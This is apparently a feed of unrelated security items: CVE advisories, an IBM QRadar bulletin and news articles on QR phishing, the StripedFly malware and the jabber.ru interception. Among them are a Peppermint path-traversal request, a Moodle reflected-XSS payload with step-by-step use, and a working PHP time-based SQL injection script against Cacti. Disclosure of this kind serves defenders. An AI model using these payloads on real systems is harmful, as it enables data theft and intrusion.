Peppermint Ticket Management before 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/users/file/download?filepath=./../ POST request.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-46863: Vulnerability: Arbitrary File Download (unauthenticated) · Issue #108 · Peppermint-Lab/peppermint

By Deeba Ahmed
Explore insights into the rise of Quishing attacks, the risks associated with QR code exploitation, and crucial preventive…
This is a post from HackRead.com Read the original post: Surge in QR Code Quishing: Check Point Records 587% Attack Spike

Explore insights into the rise of Quishing attacks, the risks associated with QR code exploitation, and crucial preventive measures to protect against this growing cybersecurity threat.

Check Point’s Harmony Email team has reported a startling increase of 587% in QR code phishing or Quishing attacks. This shocking rise was observed between August and September 2023. Researchers noted thousands of QR code-related attacks each month.

 In the company’s blog post, authored by Check Point’s cybersecurity researcher/analyst Jeremy Fuchs, explained that hackers lure users with QR codes, redirecting them to credential-harvesting websites. In the UK and Europe, around 86.66% of smartphone users have scanned one QR code at least in their lifetime, and 36.40% scanned a code at least once a week.

It isn’t surprising though because in October, Hackread.com reported the findings of SaaS-base cloud messaging security firm SlashNext, according to which a sudden spike was witnessed in QR code-based phishing attacks.

QR codes are easier to exploit because these encode complex data and a compromised code can quickly redirect users to malicious websites. SlashNext researchers noted that attackers prefer two prominent attack methods to exploit QR codes: Quishing and QRLJacking. Now, Check Point has reported that a massive rise in Quishign attacks has been noticed.

Quishing is a type of phishing attack. Unsuspecting users are tricked into accessing malicious websites or downloading malware after scanning a QR code. There are several reasons why Quishing attacks are on the rise, such as their widespread nature, as millions use them to make payments, scan menus, and access information, which makes them an attractive target for threat actors.

Moreover, QR codes can be exploited to hide malicious links, which can lead users to any website the attacker wants them to without alerting them about suspicious activity. 

Harmony Email’s team found that lately, attackers are redirecting users to credential-harvesting sites through QR code lures using social engineering to target end-users with emails that can look like this:

Image credit: Check Point

The lure used in the email is that Microsoft multi-factor authentication is expiring, and the users must re-authenticate. It is worth noting that the email’s body content claims to be sent by Microsoft, but the sender’s address is different.

To combat Quishing, you must add the OCR (Optical Character Recognition) feature in security solutions to detect malicious QR codes. OCR can help you translate the codes into the URL behind the code, and then you can run the URL through a URL analysis tool. However, suspicion should be raised right when you observe that a QR code is present in the email message body.

Since Quishing attacks are becoming a solid threat, it is essential to exercise caution. Never scan without checking the sender’s source, and avoid scanning codes provided with emails unless you have verified the sender. Security professionals must implement email security that leverages OCR for all attacks. They must implement AL, ML, and NLP-based security to understand the real intentions of a message.

****_RELATED ARTICLES_****

1.  Barcode Reader Apps on Play Store Infected with Adware
2.  Stream-Jacking: Malicious YouTube Livestreams Aid Malware
3.  How to make a QR code to accept Bitcoin while keeping it secure
4.  “Picture in Picture” Technique Exploited in Deceptive Phishing Attack
5.  Fake ROBLOX and Nintendo game cracks drop ChromeLoader malware

Surge in QR Code Quishing: Check Point Records 587% Attack Spike

IBM QRadar SIEM 7.5 is vulnerable to information exposure allowing a delegated Admin tenant user with a specific domain security profile assigned to see data from other domains.  This vulnerability is due to an incomplete fix for CVE-2022-34352.  IBM X-Force ID:  266808.

**Security Bulletin**

  

**Summary**

IBM QRadar SIEM includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. These have been addressed in the applicable CVEs. (CVE-2019-17571, CVE-2022-23305, CVE-2022-23307, CVE-2022,23302, CVE-2021-4104, CVE-2020-9488, CVE-2020-9493, CVE-2023-24329, CVE-2023-43041)

**Vulnerability Details**

**CVEID:**   CVE-2019-17571  
**DESCRIPTION:**   Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by improper deserialization of untrusted data in SocketServer. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/173314 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-23305  
**DESCRIPTION:**   Apache Log4j is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the JDBCAppender, which could allow the attacker to view, add, modify or delete information in the back-end database.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217461 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

**CVEID:**   CVE-2022-23307  
**DESCRIPTION:**   Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization in the in Apache Chainsaw component. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217462 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-23302  
**DESCRIPTION:**   Apache Log4j could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in JMSSink. By sending specially-crafted JNDI requests using TopicConnectionFactoryBindingName configuration, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217460 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2021-4104  
**DESCRIPTION:**   Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215048 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2020-9488  
**DESCRIPTION:**   Apache Log4j is vulnerable to a man-in-the-middle attack, caused by improper certificate validation with host mismatch in the SMTP appender. An attacker could exploit this vulnerability to launch a man-in-the-middle attack and gain access to the communication channel between endpoints to obtain sensitive information or further compromise the system.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/180824 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2020-9493  
**DESCRIPTION:**   Apache Chainsaw could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw when reading the log events. By sending specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/203829 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-24329  
**DESCRIPTION:**   Python could allow a remote attacker to bypass security restrictions, caused by a flaw in the urllib.parse component. By sending a specially-crafted request using URL starts with blank characters, an attacker could exploit this vulnerability to bypass blocklisting methods.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/247730 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2023-43041  
**DESCRIPTION:**   IBM QRadar SIEM is vulnerable to information exposure allowing a delegated Admin tenant user with a specific domain security profile assigned to see data from other domains. This vulnerability is due to an incomplete fix for CVE-2022-34352.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/266808 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM QRadar SIEM

7.5 - 7.5.0 UP7

**Remediation/Fixes**

IBM strongly recommends addressing the vulnerability now by upgrading

**Product**

**Version**

**Remediation/First Fix**

IBM QRadar SIEM

7.5.0 

7.5.0 UP7 IF01

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

27 Oct 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSBQAC","label":"IBM Security QRadar SIEM"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"7.5.0","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2023-43041: Security Bulletin: IBM QRadar SIEM contains multiple vulnerabilities in components.

** DISPUTED ** Moodle 4.3 allows /grade/report/grader/index.php?searchvalue= reflected XSS when logged in as a teacher. NOTE: the Moodle Security FAQ link states "Some forms of rich content [are] used by teachers to enhance their courses ... admins and teachers can post XSS-capable content, but students can not."

\# Exploit Title: Moodle 4.3 Reflected XSS

\# Date: 20/10/2023

\# Exploit Author: Root Intrud3r

\# Vendor Homepage: https://moodle.org/

\# Software Demo: https://school.moodledemo.net/

\# Version: 4.3

\# Tested on: Linux

Vulnerability Details:

Steps :

1\. Log in to the application with the given credentials > USER: teacher PASS: moodle

2\. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=

3\. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3

4\. When click this url "https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3"

5\. You will be see alert button

CVE-2023-46858: Moodle 4.3 Reflected XSS.txt

Plus: Details emerge of a US government social media-scanning tool that flags “derogatory” speech, and researchers find vulnerabilities in the global mobile communications network.

As the Israel-Hamas war raged on this week and Israel expanded its ground invasion of the Gaza Strip, the territory's compromised internet infrastructure and access to connectivity went fully dark on Friday, leaving Palestinians without access to ground or mobile data connections. Meanwhile, researchers are bracing for the fallout if Hamas makes good on its threats to distribute hostage execution videos online. And TikTokkers are using a niche livestreaming feature and exploiting the Israeli-Hamas conflict to collect virtual gifts from viewers, a portion of which goes to the social media company as a fee.

As the worst mass shooting in Maine's history unfolded this week and the gunman remained at large, disinformation about the situation and the suspect flooded social media, adding to the already chaotic and horrific situation. Elon Musk, the owner of X (formerly Twitter) posted remarks earlier this month mocking Ukrainian president Vlodymr Zelensky that were met with a flood of support and enthusiasm from Russian trolls and accounts distributing pro-Russia propaganda.

The US federal foreign intelligence collection tool—a frequently abused surveillance authority—known as Section 702 is facing its demise at the end of the year despite being viewed as the “crown jewel” of US surveillance powers. So far, no members of Congress have introduced a bill to prevent its January 1 sunset. And the identity-management platform Okta suffered a breach that had implications for nearly 200 of its corporate clients and brought up memories of a similar hack the company suffered last year that also had knock-on effects for customers.

An EU government body has been pushing a controversial proposal with far-reaching privacy implications in an attempt to combat child sexual abuse material, but its most outspoken advocates recently added to the drama significantly by essentially launching an influence campaign to support its passage. The long-foreseen nightmare of using generative AI to create digital child abuse materials has arrived with a flood of images, some of which are completely fabricated while others depict real victims generated from old datasets.

We also went deep this week on a situation in which hackers say they can crack a locked USB drive that contains a massive 7,002 bitcoins, worth about $235 million—but the drive's owner hasn't let them try.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

A cryptominer that never seemed to generate very much cryptocurrency for its creators is part of a larger digital espionage campaign, according to researchers from security firm Kaspersky Lab. The platform, which they call StripedFly, has infected more than 1 million Windows and Linux targets globally since 2017. StripedFly is modular and has multiple components for compromising targets' devices and collecting different types of data, indicating that it was likely created as part of a well-funded state espionage program, not a cybercriminal enterprise. It also includes an update mechanism so attackers can distribute improvements and new functionality to the malware.

StripedFly can, among other things, steal access credentials from compromised devices; take screenshots; grab databases, sensitive files, videos, or other information of interest; and record live audio by compromising a target's microphone. Notably, StripedFly uses an innovative, custom Tor client to mask communication and exfiltration between the malware and its command-and-control servers. It also has a ransomware component that attackers have occasionally deployed. It infects targets initially using a customized version of the notorious EternalBlue exploit leaked from the US National Security Agency.

Documents reviewed by 404 Media shed new light on US Immigration and Customs Enforcement’s scanning and database tool for identifying “derogatory” online speech about the US. Dubbed Giant Oak Search Technology (GOST), it assists ICE agents in scanning social media posts. According to the documents, they then use the findings in immigration enforcement actions.

One of the documents shows a GOST catchphrase, “We see the people behind the data,” and a user guide from the documents says GOST is “capable of providing behavioral-based internet search capabilities.” ICE agents can search the system for specific names, addresses, email addresses, and countries of citizenship. The documents say that “potentially derogatory social media can be reviewed within the interface.”

The world’s telephony networks have often been built on legacy infrastructure and with a convoluted maze of interconnections. The system enables mobile data access across much of the world, but its complexity and the collision of new and archaic technologies can lead to vulnerabilities. This week, University of Toronto’s Citizen Lab published extensive research on the degree to which roaming arrangements between mobile providers contain security issues that can be exploited to track devices, and by extension the people who own them. The flaw comes from a lack of protection on the communications between cell towers as you, for instance, travel on a train, ride a motorcycle, or walk around town. The concern is that governments, criminals, or other snoops can manipulate the weaknesses in these handoff communications to track device locations. “These vulnerabilities are most often tied to the signaling messages that are sent between telecommunications networks which expose the phones to different modes of location disclosure,” Citizen Lab researchers wrote.

This Cryptomining Tool Is Stealing Secrets

The Post Meta Data Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pmdm_wp_delete_user_meta,  pmdm_wp_delete_term_meta, and pmdm_wp_ajax_delete_meta functions in versions up to, and including, 1.2.0. This makes it possible for unauthenticated attackers to delete user, term, and post meta belonging to arbitrary users.

CVE-2023-5426

New findings have shed light on what's said to be a lawful attempt to covertly intercept traffic originating from jabber[.]ru (aka xmpp[.]ru), an XMPP-based instant messaging service, via servers hosted on Hetzner and Linode (a subsidiary of Akamai) in Germany.
"The attacker has issued several new TLS certificates using Let's Encrypt service which were used to hijack encrypted STARTTLS

New findings have shed light on what's said to be a lawful attempt to covertly intercept traffic originating from jabber\[.\]ru (aka xmpp\[.\]ru), an XMPP\-based instant messaging service, via servers hosted on Hetzner and Linode (a subsidiary of Akamai) in Germany.

"The attacker has issued several new TLS certificates using Let's Encrypt service which were used to hijack encrypted STARTTLS connections on port 5222 using transparent \[man-in-the-middle\] proxy," a security researcher who goes by the alias ValdikSS said earlier this week.

"The attack was discovered due to the expiration of one of the MiTM certificates, which haven't been reissued."

Evidence gathered so far points to the traffic redirection being configured on the hosting provider network, ruling out other possibilities, such as a server breach or a spoofing attack.

The wiretapping is estimated to have lasted for as long as six months, from April 18 through to October 19, although it's been confirmed to have taken place since at least July 21, 2023, and until October 19, 2023.

Signs of suspicious activity were first detected on October 16, 2023, when one of the UNIX administrators of the service received a "Certificate has expired" message upon connecting to it.

The threat actor is believed to have stopped the activity after the investigation into the MiTM incident began on October 18, 2023. It's not immediately clear who is behind the attack, but it's suspected to be a case of lawful interception based on a German police request.

Another hypothesis, however unlikely but not impossible, is that the MiTM attack is an intrusion on the internal networks of both Hetzner and Linode, specifically singling out jabber\[.\]ru.

"Given the nature of the interception, the attackers have been able to execute any action as if it is executed from the authorized account, without knowing the account password," the researcher said.

"This means that the attacker could download the account's roster, lifetime unencrypted server-side message history, send new messages or alter them in real time."

The Hacker News has reached out to Akamai and Hetzner for further comment, and we will update the story if we hear back.

Users of the service are recommended to assume that their communications over the past 90 days are compromised, as well as "check their accounts for new unauthorized OMEMO and PGP keys in their PEP storage, and change passwords."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Wiretapping of XMPP-Based Instant Messaging Service

HashiCorp Vagrant's Windows installer targeted a custom location with a non-protected path that could be junctioned, introducing potential for unauthorized file system writes. Fixed in Vagrant 2.4.0.

**HashiCorp Vagrant Insecure Operation on Windows Junction / Mount Point vulnerability**

Low severity GitHub Reviewed Published Oct 28, 2023 to the GitHub Advisory Database • Updated Oct 31, 2023

GHSA-47xw-vw6m-w9fq: HashiCorp Vagrant Insecure Operation on Windows Junction / Mount Point vulnerability

CVE-2023-5834: HCSEC-2023-31 - Vagrant’s Windows Installer Allowed Directory Junction Write

SQL Injection vulnerability in Cacti v1.2.25 allows a remote attacker to obtain sensitive information via the form_actions() function in the managers.php function.

Package cacti Affected versions <=1.2.25 Patched versions None Summary A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information. Details SQL Injection vulnerability discovered in managers.php. In function form\_actions(), request\_var 'selected\_items' is joined into into SQL statements without security checks. source code: function form\_actions() { global $manager\_actions, $manager\_notification\_actions; if (isset\_request\_var('selected\_items')) { if (isset\_request\_var('action\_receivers')) { $selected\_items = cacti\_unserialize(stripslashes(get\_nfilter\_request\_var('selected\_graphs\_array'))); if ($selected\_items != false) { if (get\_nfilter\_request\_var('drp\_action') == '1') { // delete db\_execute('DELETE FROM snmpagent\_managers WHERE id IN (' . implode(',' ,$selected\_items) . ')'); db\_execute('DELETE FROM snmpagent\_managers\_notifications WHERE manager\_id IN (' . implode(',' ,$selected\_items) . ')'); db\_execute('DELETE FROM snmpagent\_notifications\_log WHERE manager\_id IN (' . implode(',' ,$selected\_items) . ')'); } elseif (get\_nfilter\_request\_var('drp\_action') == '2') { // enable db\_execute("UPDATE snmpagent\_managers SET disabled = '' WHERE id IN (" . implode(',' ,$selected\_items) . ')'); } elseif (get\_nfilter\_request\_var('drp\_action') == '3') { // disable db\_execute("UPDATE snmpagent\_managers SET disabled = 'on' WHERE id IN (" . implode(',' ,$selected\_items) . ')'); } header('Location: managers.php?header=false'); exit; } PoC $url = \["http://localhost/cacti/", "http://192.168.80.128/cacti/",\]; $url = $url\[1\]; $username = 'admin'; $password = 'password'; $login = "index.php?action=login&login\_username=$username&login\_password=$password"; $injectSQLcode1=serialize(\["1 ) or if ('admin' = (SELECT username FROM user\_auth WHERE id = 1 ), sleep(5), 0"\]); $injectSQLcode2=serialize(\["1 ) or if ('error' = (SELECT username FROM user\_auth WHERE id = 1 ), sleep(5), 0"\]); $target = "managers.php?action=actions&selected\_items=1&action\_receivers=1&drp\_action=1&selected\_graphs\_array="; function curlPage($url, $cookie=false){ $curl = curl\_init(); curl\_setopt($curl, CURLOPT\_URL, $url); curl\_setopt($curl, CURLOPT\_HEADER, 1); curl\_setopt($curl, CURLOPT\_RETURNTRANSFER, 1); curl\_setopt($curl, CURLOPT\_CONNECTTIMEOUT, 60); curl\_setopt($curl, CURLOPT\_TIMEOUT, 60); if($cookie){ curl\_setopt($curl, CURLOPT\_COOKIE,$cookie); } $data = curl\_exec($curl); echo "\[++Debug++\] ".$url."\\n"; curl\_close($curl); return $data; } function getSQLinjectionPage(){ global $url, $login, $target, $injectSQLcode1, $injectSQLcode2; //login $data1 = curlPage($url.$login); //echo $data1."\\n"; //get cookie $cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32); echo '\[++Debug++\] Cacti Cookie: '.$cookie."\\n"; //check login $data2 = curlPage($url."index.php", $cookie); //echo substr($data2, 0, 300)."\\n\\n"; //time of correct test $time1 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode1), $cookie); $time1 = time() - $time1; echo "\[++result++\] time of correct test: ".$time1."\\n\\n"; //time of error test $time2 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode2), $cookie); $time2 = time() - $time2; echo "\[++result++\] time of error test: ".$time2."\\n\\n"; if( $time2 <=1 and $time1 >= 5){ echo "\[++result++\] Time difference exist, vulnerability exsit!"."\\n\\n"; }else{ echo "\[++result++\] No time difference, vulnerability not exsit"."\\n\\n"; } } //set ip, port, username, password, InjectCode first getSQLinjectionPage(); Impact Although there is no echo，by measuring the time delay of accessing the website, authenticated users can obtain mysql database content.

Tag

#auth